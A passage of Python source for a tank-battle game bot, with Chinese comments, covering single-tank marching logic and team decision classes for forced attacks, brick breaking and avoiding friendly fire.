下一步是停留,就没必要过多判断了 returnAction = attackAction raise OUTER_BREAK realAction = player.try_make_decision(attackAction) if _isFirstRoute: # 缓存真实判断 _firstRealAction = realAction # debug_print(player, attackAction, realAction) if Action.is_stay(realAction): # 存在风险 if Action.is_move(attackAction): # 特殊情况,如果下下回合就要打掉对方基地 # 那就没必要乱跑了 5cddde4dd2337e01c79f0ba3 # if battler.is_face_to_enemy_base(): returnAction = realAction raise OUTER_BREAK # (inserted) 主动打破僵局:因为遇到敌人,为了防止被射杀而停留 # 注: # 在上方的主动防御模式里还有一段和这里逻辑基本一致的代码 #-------------------------- if (player.has_status_in_previous_turns(Status.WAIT_FOR_MARCHING, turns=1) and player.has_status_in_previous_turns(Status.PREVENT_BEING_KILLED, turns=1) ): # 即将停留第二回合 riskyBattler = player.get_risky_enemy() riskyPlayer = Tank2Player(riskyBattler) # # 判断敌人不会攻击我的标准 # # 1. 敌人当前回合可以射击 # 2。 敌人上回合也可以射击 # 3. 敌人上回合与上上回合的行为相同,也就是已经连续移动了两个回合或者等待了两个回合 # 这个补充条件非常重要 5cde71a4d2337e01c79f9a77 # # TODO: # 这个条件仍然不对!! 5ce220add2337e01c7a38462 # if (riskyBattler.canShoot # 当回合可以射击 and not riskyPlayer.has_status_in_previous_turns(Status.RELOADING) # 上回合也可以射击 and riskyPlayer.get_previous_action(back=1) == riskyPlayer.get_previous_action(back=2) ): # 说明敌人大概率不打算攻击我 if (Action.is_move(riskyPlayer.get_previous_action(back=1)) and battler.get_manhattan_distance_to(riskyBattler) == 2 ): # 这种情况对应着对方刚刚到达拐角处,这种情况是有危险性的,因此再停留一回合 5cd4045c86d50d05a00840e1 player.set_status(Status.WAIT_FOR_MARCHING) player.set_status(Status.PREVENT_BEING_KILLED) pass else: # TODO: # 此处需要检查是否应该预先破墙 5ce21ba2d2337e01c7a37dbd # player.set_status(Status.KEEP_ON_MARCHING) returnAction = attackAction raise OUTER_BREAK # 原本的移动,现在变为停留 #------------------------ # 停着就是在浪费时间,不如选择进攻 # fields = battler.get_destroyed_fields_if_shoot(attackAction) # # 如果当前回合射击可以摧毁的对象中,包含自己最短路线上的块 # 那么就射击 # for field in fields: if route.has_block(field): # 为 block 对象,该回合可以射击 action = player.try_make_decision(battler.shoot_to(field)) if Action.is_shoot(action): # 这个信号是他现在的真实体现,可以用来触发团队破墙信号 player.set_status(Status.WAIT_FOR_MARCHING) player.set_status(Status.PREVENT_BEING_KILLED) returnAction = action raise OUTER_BREAK # # 如果能摧毁的是基地外墙,仍然选择攻击 # 因为在攻击后可能可以给出更加短的路线 # for field in fields: if battler.check_is_outer_wall_of_enemy_base(field): action = player.try_make_decision(battler.shoot_to(field)) if Action.is_shoot(action): # 这个信号是他现在的真实体现,可以用来触发团队破墙信号 player.set_status(Status.WAIT_FOR_MARCHING) player.set_status(Status.PREVENT_BEING_KILLED) returnAction = action raise OUTER_BREAK # # 如果不能摧毁和地方基地周围的墙,但是可以摧毁与自己中间相差一格的墙,那么仍然选择攻击 # 这种情况多半属于,如果当前回合往前走一步,可能被垂直方向的敌人射杀,因为不敢前进 # 在多回合后,我方可能会主动突破这种僵持情况。在我方主动向前一步的时候,敌人将可以 # 射击我方坦克。如果前方有一个空位,那么我方坦克就可以闪避到前方的空位上,从而继续前进。 # 如果这个位置本来是个砖块,但是没有预先摧毁,我方坦克在突击后就只能选择原路闪回, # 那么就可能出现僵局 # 因此这里预先摧毁和自己相差一格的土墙,方便后续突击 # # 如果是防御状态,那么不要随便打破墙壁! 5cd31d84a51e681f0e91ca2c # if (not player.has_status(Status.DEFENSIVE) # 防御性无效 and battler.is_in_enemy_site() # 只有在对方基地的时候才有效 ): for field in fields: if (isinstance(field, BrickField) and battler.get_manhattan_distance_to(field) == 2 # 距离为 2 相当于土墙 and battler.canShoot ): # 这个信号是他现在的真实体现,可以用来触发团队破墙信号 player.set_status(Status.WAIT_FOR_MARCHING) player.set_status(Status.PREVENT_BEING_KILLED) player.set_status(Status.READY_TO_CLEAR_A_ROAD_FIRST) returnAction = battler.shoot_to(field) raise OUTER_BREAK elif Action.is_shoot(attackAction): # 如果为射击行为,检查是否是墙后敌人造成的 enemy = battler.get_enemy_behind_brick(attackAction, interval=-1) if enemy is not None: player.set_risky_enemy(enemy) # 额外指定一下,确保是这个敌人造成的 player.set_status(Status.HAS_ENEMY_BEHIND_BRICK) # # 强攻行为,如果出现这种情况,双方均在拆家,但是对方坦克下一步有可能移到我方坦克后方 # 对于这种情况,大部分人应该选择继续进攻,同时绕开麻烦,因为进攻的时候还考虑击杀敌人 # 一般会延误战机。这种情况下应该判定为敌方坦克不会来尝试击杀我方坦克,那么就继续攻击 # 5ce57074d2337e01c7a7b128 # oppBattler = player.get_risky_enemy() if (battler.is_in_enemy_site() # 双方均在对方基地方时才触发 and oppBattler.is_in_enemy_site() ): # # 现在尝试看对方是否能够找到一条不受到我方坦克影响的最短攻击路线 # 通常应该是可以找到的 # _consideredActions = set() # 缓存已经考虑过的行为 for route in oppBattler.get_all_shortest_attacking_routes(): _action = oppBattler.get_next_attacking_action() if _action in _consideredActions: continue _consideredActions.add(_action) with map_.simulate_one_action(oppBattler, _action): if not battler.has_enemy_around(): # 说明找到了一条可以躲开我方坦克的路线 player.set_status(Status.KEEP_ON_MARCHING) returnAction = attackAction raise OUTER_BREAK # # 否则停止不前 # 此时必定有 riskyEnemy # player.set_status(Status.WAIT_FOR_MARCHING) # 可能触发 Signal.PREPARE_FOR_BREAK_BRICK 和 Signal.FORCED_MARCH player.set_status(Status.PREVENT_BEING_KILLED) # TODO: 这个状态是普适性的,希望在上面的各种情况中都能补全 if _isFirstRoute: _firstPreventBeingKilled = True # 缓存状态,仅仅在因为防止被杀而停留的状态下缓存,其他情况不算 _firstStatus = player.get_status().copy() # 结束时常规地要复制一次,避免没有第二条路的情况 returnAction = Action.STAY continue # 停留动作,尝试继续寻找 # 对于移动行为,有可能处于闪避到远路又回来的僵局中 5cd009e0a51e681f0e8f3ffb # 因此在这里根据前期状态尝试打破僵局 #---------------------------------- if (player.has_status_in_previous_turns(Status.WILL_DODGE_TO_LONG_WAY, turns=1) # 说明上回合刚闪避回来 and Action.is_move(realAction) # 然后这回合又准备回去 ): # TODO: # 此处是否有必要进一步检查两次遇到的敌人为同一人? # # # 首先考虑前方相距一格处是否有土墙,如果有,那么就凿墙 5cd009e0a51e681f0e8f3ffb # if battler.will_destroy_a_brick_if_shoot(realAction): field = battler.get_destroyed_fields_if_shoot(realAction)[0] if (not battler.is_in_our_site(field) # 这个 brick 必须不在我方基地! and battler.get_manhattan_distance_to(field) == 2 and battler.canShoot ): player.set_status(Status.KEEP_ON_MARCHING) # 真实体现 returnAction = battler.shoot_to(field) raise OUTER_BREAK #player.add_label(Label.ALWAYS_DODGE_TO_LONG_WAY) # 如果能够运行到这里,就添加这个标记 # 预判一步,如果下一步会遇到敌人,并且不得不回头闪避的话,就考虑先摧毁与自己中间相差一格的墙(如果存在) # 类似于主动防御的情况 # if Action.is_move(realAction): if battler.is_face_to_enemy_base(ignore_brick=True): # 如果已经和基地处在同一直线上 with map_.simulate_one_action(battler, realAction): if not battler.is_face_to_enemy_base(ignore_brick=True): returnAction = Action.STAY # 如果移动后不再面对敌人基地,那么就不移动 raise OUTER_BREAK if (not player.has_status(Status.DEFENSIVE) # 防御性无效 and battler.is_in_enemy_site() # 只有在敌方地盘时才有效! and battler.will_destroy_a_brick_if_shoot(realAction) # 如果下回合能射掉一个墙 ): _needToBreakWallFirst = True with map_.simulate_one_action(battler, realAction): enemies = battler.get_enemies_around() if len(enemies) == 0: # 没有敌人根本不需要预判 _needToBreakWallFirst = False else: with outer_label() as OUTER_BREAK_2: route1 = battler.get_shortest_attacking_route() for enemy in battler.get_enemies_around(): for action in battler.try_dodge(enemy): with map_.simulate_one_action(battler, action): route2 = battler.get_shortest_attacking_route() # 只有 route1 为 delay = 0 的选择才可比较 if route2.length <= route1.length: # 如果存在着一种闪避方法使得闪避后线路长度可以不超过原线路长度 _needToBreakWallFirst = False # 那么就不破墙 raise OUTER_BREAK_2 if _needToBreakWallFirst: # 现在尝试破墙 shootAction = realAction + 4 for field in battler.get_destroyed_fields_if_shoot(shootAction): if isinstance(field, BrickField): if battler.get_manhattan_distance_to(field) == 2: # 距离为 2 的土墙 if battler.canShoot: player.set_status(Status.WAIT_FOR_MARCHING) player.set_status(Status.READY_TO_CLEAR_A_ROAD_FIRST) returnAction = shootAction # 不检查安全性 raise OUTER_BREAK if (_needToBreakWallFirst and not battler.canShoot # 需要射击但是暂时没有炮弹,那么就等待 ): player.set_status(Status.WAIT_FOR_MARCHING) returnAction = Action.STAY continue # # 考虑这样一种情况,如果下回合我可以射击且对方可以射击,我们中间差两个墙,如果我方不射击 # 对方可能就会压制过来,这样就很亏,所以当双方都有炮且两者间差一个墙的时候,我方优先射击 # 5cea974dd2337e01c7add31f # if (( player.has_status(Status.AGGRESSIVE) or player.has_status(Status.STALEMENT) ) and Action.is_move(realAction) and battler.canShoot ): shootAction = realAction + 4 _hasEnemyBehindTwoBricks = False oppBattler = None destroyedFields = battler.get_destroyed_fields_if_shoot(shootAction) if (len(destroyedFields) == 1 and isinstance(destroyedFields[0], BrickField) # 前方是墙 and battler.get_enemy_behind_brick(shootAction, interval=-1) is None # 现在墙后无人 ): with map_.simulate_one_action(battler, shootAction): destroyedFields = battler.get_destroyed_fields_if_shoot(shootAction) if len(destroyedFields) == 1 and isinstance(destroyedFields[0], BrickField): # 现在前面还有墙 enemy = battler.get_enemy_behind_brick(shootAction, interval=-1) if enemy is not None: # 此时墙后有人 _hasEnemyBehindTwoBricks = True oppBattler = BattleTank(enemy) if _hasEnemyBehindTwoBricks: if oppBattler.canShoot: # 此时对方也可以射击 player.set_status(Status.KEEP_ON_MARCHING) returnAction = shootAction # 那么我方这回合优先开炮,避免随后和对方进入僵持阶段 raise OUTER_BREAK # # move action 在这之前必须要全部处理完! # # # 侵略模式下优先射击,如果能够打掉处在最短路线上的墙壁 #------------------- if (player.has_status(Status.AGGRESSIVE) and Action.is_move(realAction) and battler.canShoot ): shootAction = realAction + 4 for field in battler.get_destroyed_fields_if_shoot(shootAction): if isinstance(field, BrickField) and field.xy in route: # 能够打掉一个处于最短路线上的土墙 action = player.try_make_decision(shootAction) if Action.is_shoot(action): player.set_status(Status.KEEP_ON_MARCHING) realAction = shootAction # 注意:这里修改了 realAction 方便后续判断,但是这是非常不好的一个做法 break # # 禁止随便破墙!容易导致自己陷入被动! # if Action.is_shoot(realAction): # # 敌人处在墙后的水平路线上,并且与墙的间隔不超过 1 个空格 5cd33a06a51e681f0e91de95 # 事实上 1 个空格是不够的! 5cd35e08a51e681f0e92182e # _shouldStay = False oppBattler = None enemy = battler.get_enemy_behind_brick(realAction, interval=-1) if enemy is not None: # 墙后有人,不能射击 # 否则就等待 #--------------- player.set_risky_enemy(enemy) # 设置这个敌人! player.set_status(Status.HAS_ENEMY_BEHIND_BRICK) player.set_status(Status.WAIT_FOR_MARCHING) _shouldStay = True # # 敌人下一步可能移到墙后面 # if not _shouldStay: with outer_label() as OUTER_BREAK_2: for oppBattler in [ _oppPlayer.battler for _oppPlayer in player.opponents ]: if oppBattler.destroyed: continue for moveAction in oppBattler.get_all_valid_move_actions(): with map_.simulate_one_action(oppBattler, moveAction): enemy = battler.get_enemy_behind_brick(realAction, interval=-1) if enemy is not None: # 此时如果直接出现在墙的后面 player.set_status(Status.WAIT_FOR_MARCHING) player.set_status(Status.ENEMY_MAY_APPEAR_BEHIND_BRICK) player.set_risky_enemy(enemy) # 仍然将其设置为墙后敌人 _shouldStay = True raise OUTER_BREAK_2 # # 并不是一定不能破墙,需要检查敌人是否真的有威胁 # # 1. 和队友相遇的敌人可以忽略 5ce209c1d2337e01c7a36a0a # 2. 和队友隔墙僵持的敌人可以忽略(这种情况非常有可能) 5ce5678ed2337e01c7a79ace # 3. 对手正在和队友僵持的敌人可以忽略 5ce70df6d2337e01c7a98926 # 4. 如果对手威胁我的位置他曾经到过,那么可以忽略 5ce266a1d2337e01c7a3cc90 # if _shouldStay and oppBattler is not None: teammateBattler = teammate.battler oppTank = oppBattler.tank # 考虑两人相对 for enemy in teammateBattler.get_enemies_around(): if enemy is oppTank: # 被队友牵制的敌人可以忽略 _shouldStay = False break # 考虑是否隔墙僵持 _action = teammateBattler.get_next_attacking_action() if not Action.is_stay(_action): enemy = teammateBattler.get_enemy_behind_brick(_action, interval=-1) if enemy is oppTank: # 和队友隔墙僵持的敌人可以忽略 _shouldStay = False # 考虑是否和队友僵持 if teammateBattler.get_manhattan_distance_to(oppBattler) == 2: _action = oppBattler.get_next_attacking_action() with map_.simulate_one_action(oppBattler, _action): # 模拟一步后和队友相遇 if teammateBattler.get_manhattan_distance_to(oppBattler) == 1: _shouldStay = False # # 如果敌人威胁我的位置它曾经到过(这种情况实际上包含了第三点) # # 先找到威胁我方坦克的位置 _enemyRiskySite = None # (x, y) with map_.simulate_one_action(battler, realAction): for _action in oppBattler.get_all_valid_move_actions(): with map_.simulate_one_action(oppBattler, _action): if battler.on_the_same_line_with(oppBattler): _enemyRiskySite = oppBattler.xy break #assert _enemyRiskySite is not None # 一定会找到? enemyAttackingRoute = oppBattler.get_shortest_attacking_route() # # 不在敌人的进攻路线上,这样才算是已经走过,否则可以认为他在晃墙? # 5cec129e4742030582fac36d # if not _enemyRiskySite in enemyAttackingRoute: with map_.auto_undo_revert() as counter: while map_.revert(): # 回滚成功则 True counter.increase() if oppBattler.xy == _enemyRiskySite: # 他曾经到过这个地方 _shouldStay = False break if (_shouldStay and player.has_status(Status.ENEMY_MAY_APPEAR_BEHIND_BRICK) ): # 不能在这种情况下破墙! 5cec129e4742030582fac36d returnAction = Action.STAY continue if _shouldStay: # 先尝试 shoot 转 move #--------------- if Action.is_shoot(realAction): moveAction = realAction - 4 action = player.try_make_decision(moveAction) if Action.is_move(action): returnAction = action break if _shouldStay: # 否则 stay returnAction = Action.STAY continue # # (inserted) 打破老是回头的僵局 # # 尝试向着两边闪避 5ced9540641dd10fdcc79752 # if (oppBattler is not None # 好吧 ... 不加这个可能过不了自动测试 -> TODO: 也许我们不应该再替对方决策一遍? and player.has_label(Label.ALWAYS_BACK_AWAY) and not battler.is_in_our_site(include_midline=True) # 限制为严格地不在我方基地 ): for action in battler.try_dodge(oppBattler): _realAction = player.try_make_decision(action) if not Action.is_stay(_realAction): # 可走的路线,那么直接闪避 player.set_status(Status.TRY_TO_BREAK_ALWAYS_BACK_AWAY) player.remove_labels(Label.ALWAYS_BACK_AWAY) # 那么就打破了这个状态 realAction = _realAction # 并将闪避方向作为这回合的攻击方向 break # 否则继续攻击 player.set_status(Status.KEEP_ON_MARCHING) returnAction = realAction raise OUTER_BREAK # endfor # endwith player.set_current_attacking_route(route) # 缓存攻击路线 # # 现在判断是否是第一条路线,并考虑它的合理性! # # 乱回头实在是太蠢了! 5cee6727641dd10fdcc8dd96 -> 5cee6e3d641dd10fdcc8e8cf # if (not _isFirstRoute # 选的是非第一条路线 and _firstPreventBeingKilled # 不选一条的原因是为了防止被杀 and Action.is_move(realAction) # 这条路线给出的行为是移动 and Action.is_move(_firstAttackAction) # 第一个进攻路线也是移动 and Action.is_opposite(realAction, _firstAttackAction) # 于是这条路线给出的移动方向是远离进攻路线的方向! ): # 这种情况下应该停下来! returnAction = Action.STAY player.remove_status(Status.KEEP_ON_MARCHING) player.set_status(*_firstStatus) player.set_current_attacking_route(_firstRoute) # 找到一个侵略性的行为 if not Action.is_stay(returnAction): return returnAction # # 否则返回 STAY # 此处查找是否和第一条路线的决策结果一致,如果一致,那么就将第一次决策下的各种状态还原 # if (_firstRealAction is not None and Action.is_stay(_firstRealAction) ): if _firstStatus is not None: player.set_status(*_firstStatus) player.set_current_attacking_route(_firstRoute) return Action.STAY #{ END 'decision/single/marching.py' }# #{ BEGIN 'decision/team/individual.py' }# class IndividualTeamDecision(TeamDecisionMaker): """ 两人分别单独地进行决策,团队决策的起点 """ def _make_decision(self): team = self._team player1, player2 = team.players action1, _ = player1.make_decision() action2, _ = player2.make_decision() return [ action1, action2 ] #{ END 'decision/team/individual.py' }# #{ BEGIN 'decision/team/vital.py' }# class VitalTeamDecision(TeamDecisionMaker): """ 将关键的个人决策设置为团队决策,个人决策即为团队最优决策, 低优先级决策者不可对其进行协调 """ def _make_decision(self): team = self._team for player in team.players: if ( player.has_status(Status.SACRIFICE_FOR_OUR_BASE) # 准备为防御基地牺牲 or player.has_status(Status.BLOCK_ROAD_FOR_OUR_BASE) # 准备为防御基地堵路 or player.has_status(Status.READY_TO_ATTACK_BASE) # 准备攻击敌方基地 or player.has_status(Status.READY_TO_KILL_ENEMY) # 准备击杀敌人 ): # TODO: 牺牲攻击局,可能需要考虑一下闪避 5ccca535a51e681f0e8c7131 action = player.get_current_decision() player.set_team_decision(action) # 将个人决策设置为团队决策 return [ player.get_current_decision() for player in team.players ] #{ END 'decision/team/vital.py' }# #{ BEGIN 'decision/team/leave_teammate.py' }# class LeaveTeammateTeamDecision(TeamDecisionMaker): """ 和队友打破重叠的团队决策 己方两个坦克重叠在一起这种事情实在是太愚蠢了 ... """ def _make_decision(self): team = self._team player1, player2 = team.players returnActions = [ player.get_current_decision() for player in team.players ] if player1.defeated or player2.defeated: # 有队友已经挂了,那就不需要考虑这个情况了 return returnActions if player1.tank.xy == player2.tank.xy: if len([ action for action in returnActions if Action.is_move(action) ]) == 1: pass # 一人移动一人非移动,那么是合理的 elif ( all( Action.is_move(action) for action in returnActions ) and returnActions[0] != returnActions[1] ): # 两人均为移动,但是两人的移动方向不一样,这样也是可以的 pass elif all([ player.has_team_decision() for player in team.players ]): pass # 两者都拥有团队命令 else: # 两个队员可以认为是一样的,因此任意选择一个就好 if player1.has_team_decision(): player, idx = (player2, 1) else: player, idx = (player1, 0) with player.create_snapshot() as manager: action3, signal3 = player.make_decision(Signal.SHOULD_LEAVE_TEAMMATE) if signal3 == Signal.READY_TO_LEAVE_TEAMMATE: returnActions[idx] = action3 player.set_team_decision(action3) manager.discard_snapshot() # 保存更改 return returnActions #{ END 'decision/team/leave_teammate.py' }# #{ BEGIN 'decision/team/forced_attack.py' }# class ForcedAttackTeamDecision(TeamDecisionMaker): """ 强攻信号 ---------------- 为了解决单人决策行为过于保守的问题 在攻击过程中,一些所谓的有潜在危险的行为,实际上一点危险都没有,但是为了防止出错,就原地等待, 这反而是贻误了战机,甚至最后还要匆忙转攻为守,实际上根本就防不住 所以应该根据战场形势分析潜在风险究竟有多大,如果实际上是没有风险的,就发动强攻信号,让攻击者 保持进攻,而不去过分规避风险 如下情况是值得发动强攻信号的: 1. 侵略/僵持模式,出现了停止前进,防止被杀的状况 - 敌人正在和队友交火,敌人此回合可以射击,但是下回合必定会攻击队友 - 敌人正在和队友隔墙僵持,敌人可以射击,但是他并不攻击,多半是为了拖延战局 - 敌人正在和队友重叠,敌人可以射击,但是他一直在等待队友决策 2. 侵略/僵持模式,出现了停止前进,两方均越过了中线,对方明显不会回头,不想防你 """ def _make_decision(self): team = self._team Tank2Player = type(team.players[0]) returnActions = [ player.get_current_decision() for player in team.players ] for player in team.players: action = player.get_current_decision() if player.has_team_decision() or player.defeated: continue if ( player.has_status(Status.AGGRESSIVE) # 侵略模式 or player.has_status(Status.STALEMENT) # 僵持模式 ): if (action == Action.STAY # 但是出现了停止前进 and player.has_status(Status.WAIT_FOR_MARCHING) # 等待行军 and player.has_status(Status.PREVENT_BEING_KILLED) # 是为了防止被杀 ): _shouldForcedMarch = False playerRiskyEnemyBattler = player.get_risky_enemy() if playerRiskyEnemyBattler is None: # 说明是因为没有弹药? continue oppPlayer = Tank2Player(playerRiskyEnemyBattler) teammate = player.teammate # 考虑队友和敌军的情况 #debug_print(player.get_risky_enemy()) #debug_print(teammate.get_risky_enemy()) # 敌人正在和队友交火 #------------------ # 这种情况直接前进 # if (oppPlayer.has_status(Status.ENCOUNT_ENEMY) and oppPlayer.has_status(Status.READY_TO_FIGHT_BACK) and oppPlayer.get_risky_enemy() is teammate.battler ): # 说明对方正准备和队友交火 _shouldForcedMarch = True # 敌人正在和队友隔墙僵持 #---------------------- # 如果他们僵持了超过一回合以上 # 保守起见,等待一回合,如果对方并未攻击我,说明它更关心和队友僵持,或者故意在拖时间 # # 那么可以直接进攻 # elif (oppPlayer.has_status(Status.HAS_ENEMY_BEHIND_BRICK) # 僵持超过一回合 and oppPlayer.has_status_in_previous_turns(Status.HAS_ENEMY_BEHIND_BRICK, turns=1) and oppPlayer.get_risky_enemy() is teammate.battler and player.has_status_in_previous_turns(Status.WAIT_FOR_MARCHING, turns=1) # 已经等待了一回合 and player.has_status_in_previous_turns(Status.PREVENT_BEING_KILLED, turns=1) ): _shouldForcedMarch = True # 敌人正在和队友重叠 #---------------------------- # 如果他们重叠不动超过一回合以上 # 保守起见,等待一回合,如果对方并未攻击我,说明它更关心和队友重叠 # # 那么可以直接进 # elif (oppPlayer.has_status(Status.OVERLAP_WITH_ENEMY) # 僵持超过一回合 and oppPlayer.has_status_in_previous_turns(Status.OVERLAP_WITH_ENEMY, turns=1) and player.has_status_in_previous_turns(Status.WAIT_FOR_MARCHING, turns=1) # 已经等待了一回合 and player.has_status_in_previous_turns(Status.PREVENT_BEING_KILLED, turns=1) ): _shouldForcedMarch = True # 双方均跨过中线 #----------------------------- # 那么不再反击,直接进攻? # # TODO: # 存在着一攻一守的 bot # if _shouldForcedMarch: # 建议强制行军 with player.create_snapshot() as manager: action3, signal3 = player.make_decision(Signal.FORCED_MARCH) if Signal.is_break(signal3): continue if signal3 == Signal.READY_TO_FORCED_MARCH: returnActions[player.id] = action3 player.set_team_decision(action3) player.set_status(Status.FORCED_MARCHING) manager.discard_snapshot() return returnActions #{ END 'decision/team/forced_attack.py' }# #{ BEGIN 'decision/team/break_brick.py' }# class BreakBrickTeamDecision(TeamDecisionMaker): """ 主动破墙的团队决策 ----------------- 乱破墙是不可以的,单人不要随便破墙,但是有条件的破墙是可以的 """ def _make_decision(self): team = self._team Tank2Player = type(team.players[0]) returnActions = [ player.get_current_decision() for player in team.players ] for player in team.players: action = player.get_current_decision() if player.has_team_decision() or player.defeated: continue if (Action.is_stay(action) # 当前回合处于等待状态 and player.has_status(Status.HAS_ENEMY_BEHIND_BRICK) # 墙后有人造成的 and player.has_status(Status.WAIT_FOR_MARCHING) # 因此等待行军 #and not player.has_status(Status.DEFENSIVE) # 不要让防御性的队友随意破墙 and not player.has_status(Status.RELOADING) # 目前有弹药 # and self.has_status_in_previous_turns(player, Status.WAIT_FOR_MARCHING, turns=1) # 改成一有机会就先留后路 ): # 触发的条件是一方隔墙,队友因为这两个人的僵持受到牵制 #---------------------------------------------------- # 僵持方先破墙,留好后路 #---------------------- with player.create_snapshot() as manager: action3, signal3 = player.make_decision(Signal.PREPARE_FOR_BREAK_BRICK) if Signal.is_break(signal3): continue if signal3 == Signal.READY_TO_PREPARE_FOR_BREAK_BRICK: # 下一步准备凿墙 returnActions[player.id] = action3 player.set_team_decision(action3) manager.discard_snapshot() continue # 至此该队员决策完成,等待它这回合凿墙 # elif signal3 == Signal.READY_TO_BREAK_BRICK: # 否则将受到破墙信号,开始判断是否符合破墙条件 elif signal3 == Signal.READY_TO_BREAK_BRICK: oppBattler = player.get_risky_enemy() # 获得墙后敌人 assert oppBattler is not None # 必定有风险敌人 oppPlayer = Tank2Player(oppBattler) # playerIdx = idx # teammateIdx = 1 - idx teammate = player.teammate _shouldBreakBrick = False if oppBattler.has_enemy_around(): # 发现敌人和队友相遇,立即破墙 _shouldBreakBrick = True ''' 这个两个触发已经不再需要了 5ce217e8d2337e01c7a3790c # TODO: # 这种情况挺难遇到的,而且一旦遇到一般都为时过晚 # 应该要模拟地图预测一下,提前开一炮 # if (teammate.has_status(Status.WAIT_FOR_MARCHING) # 队友等待 # and self.has_status_in_previous_turns(teammate, Status.WAIT_FOR_MARCHING, turns=1) and teammate.has_status(Status.PREVENT_BEING_KILLED) # 队友是为了防止被杀 ): teammateRiskyEnemyBattler = teammate.get_risky_enemy() playerRiskyEnemyBattler = player.get_risky_enemy() # 墙后敌人 if teammateRiskyEnemyBattler is playerRiskyEnemyBattler: # 两者受到同一个敌人牵制,那么发动破墙信号 _shouldBreakBrick = True elif ( teammate.has_status(Status.AGGRESSIVE) or teammate.has_status(Status.STALEMENT) ): teammateAction = returnActions[ teammateIdx ] if (Action.is_move(teammateAction) # 确保队友动作为移动 and teammate.has_status(Status.KEEP_ON_MARCHING) # 队友正在行军 ): # 尝试模拟下一回合的队友状态,并让队友重新决策,查看他的状态 with map_.simulate_one_action(teammate, teammateAction): action4, _ = teammate.make_decision() if (teammate.has_status(Status.WAIT_FOR_MARCHING) and teammate.has_status(Status.PREVENT_BEING_KILLED) ): # 这个时候队友被阻拦 teammateRiskyEnemyBattler = teammate.get_risky_enemy() playerRiskyEnemyBattler = player.get_risky_enemy() if teammateRiskyEnemyBattler is playerRiskyEnemyBattler: _shouldBreakBrick = True # 如果是因为对面墙的坦克在阻拦,那么马上破墙''' # # 如果遇到对手准备和队友对射 5cd364e4a51e681f0e921e7a # 那么考虑直接破墙 # # 敌方当前回合应该必定会还击,否则就失去了防御的意义 # 于是,随后就会遇到二对一且三方均没有炮弹 # 如果对方下回合不走,那么二打一直接干掉 # 如果对方下回合移动,那么攻击的队友就解除了威胁,可以继续前进 # if (not teammate.has_status(Status.DEFENSIVE) and teammate.has_status(Status.ENCOUNT_ENEMY) and teammate.has_status(Status.READY_TO_FIGHT_BACK) ): teammateRiskyEnemyBattler = teammate.get_risky_enemy() playerRiskyEnemyBattler = player.get_risky_enemy() if teammateRiskyEnemyBattler is playerRiskyEnemyBattler: _shouldBreakBrick = True if _shouldBreakBrick: returnActions[player.id] = action3 player.set_team_decision(action3) manager.discard_snapshot() continue return returnActions #{ END 'decision/team/break_brick.py' }# #{ BEGIN 'decision/team/back_to_help.py' }# class BackToHelpTeamDecision(TeamDecisionMaker): """ 考虑一种墙后后退的逻辑 5cea650cd2337e01c7ad8de4 这样可以制造二打一的局面 TODO: 回退后可能会造成 WITHDRAW 的情况出现 ? """ def _make_decision(self): team = self._team map_ = team._map Tank2Player = type(team.players[0]) returnActions = [ player.get_current_decision() for player in team.players ] for player in team.players: action = player.get_current_decision() if player.has_team_decision() or player.defeated: continue teammate = player.teammate teammateBattler = teammate.battler if (player.has_status(Status.HAS_ENEMY_BEHIND_BRICK) and teammate.has_status(Status.WITHDRAW) and teammate.has_status(Status.ENCOUNT_ENEMY) and (teammate.has_status(Status.READY_TO_FIGHT_BACK) or teammate.has_status_in_previous_turns(Status.READY_TO_FIGHT_BACK, turns=1) ) # 保持对射行为, # TODO: # 或许可以考虑用 对射状态描述撤退状态下的对射? ): battler = player.battler oppBattler = player.get_risky_enemy() if oppBattler is None: # 5cee87fc641dd10fdcc91b44 为何空指针 ??? continue oppPlayer = Tank2Player(oppBattler) teammateRiskyEnemyTank = oppPlayer.teammate.tank # 当前和我墙后僵持的敌人的队友 if oppBattler is not None and teammateRiskyEnemyTank is not None: # 应该不会这样? backAwayAction = battler.back_away_from(oppBattler) _shouldBackAway = False with map_.auto_revert() as counter: while map_.is_valid_move_action(battler, backAwayAction): map_.single_simulate(battler, backAwayAction) counter.increase() if teammateRiskyEnemyTank in battler.get_enemies_around(): _shouldBackAway = True break if _shouldBackAway: with player.create_snapshot() as manager: action3, signal3 = player.make_decision(Signal.SUGGEST_TO_BACK_AWAY_FROM_BRICK) if Signal.is_break(signal3): continue if signal3 == Signal.READY_TO_BACK_AWAY_FROM_BRICK: returnActions[player.id] = action3 player.set_team_decision(action3) continue return returnActions #{ END 'decision/team/back_to_help.py' }# #{ BEGIN 'decision/team/prevent_team_hurt.py' }# class PreventTeamHurtTeamDecision(TeamDecisionMaker): """ 防止队员自残 -------------- 在决策链的最后,判断是否出现队友恰好打掉准备移动的队友的情况,并加以协调 """ def _make_decision(self): team = self._team map_ = team._map oppBase = map_.bases[1 - team.side] player1, player2 = team.players returnActions = [ player.get_current_decision() for player in team.players ] if player1.defeated or player2.defeated: # 有队友已经挂了,没必要考虑这个情况 return returnActions action1, action2 = returnActions _mayShouldForcedStop = False if Action.is_shoot(action1) and Action.is_move(action2): shootAction = action1 shootPlayer = player1 moveAction = action2 movePlayer = player2 _mayShouldForcedStop = True elif Action.is_move(action1) and Action.is_shoot(action2): shootAction = action2 shootPlayer = player2 moveAction = action1 movePlayer = player1 _mayShouldForcedStop = True if _mayShouldForcedStop: moveBattler = movePlayer.battler shootBattler = shootPlayer.battler _shouldForcedStop = False with map_.simulate_one_action(moveBattler, moveAction): with map_.simulate_one_action(shootBattler, shootAction): if moveBattler.destroyed: # 刚好把队友打死 ... _shouldForcedStop = True if _shouldForcedStop: # # TODO: # 如何决策? # 改动射击和决策都有可能很危险 # # # 这里先做一个特殊情况,那就是重叠攻击基地,这种情况将移动的队友视为不移动 # # TODO: # 好吧,这种情况和主动和队友打破重叠的行为是相斥的 ... # '''if (moveBattler.xy == shootBattler.xy and moveBattler.is_face_to_enemy_base(ignore_brick=False) and shootBattler.is_face_to_enemy_base(ignore_brick=False) ): returnActions[movePlayer.id] = Action.STAY hasTeamActions[movePlayer.id] = True''' # # 先判断这种情况 5ce92f70d2337e01c7abf587 #----------------- # # 默认让射击队友停下 #-------------------- stayID = shootBattler.id stopPlayer = shootPlayer # # 以下情况,应该让 moveBattler 停下来 # # 1. 射击队友正在和敌人对射 # 2. 射击队员正面向敌人基地(为了触发团队协作) # # 其他更有待补充 ... # if (shootPlayer.has_status(Status.READY_TO_FIGHT_BACK) or shootPlayer.battler.on_the_same_line_with(oppBase, ignore_brick=True) ): stayID = moveBattler.id stopPlayer = movePlayer 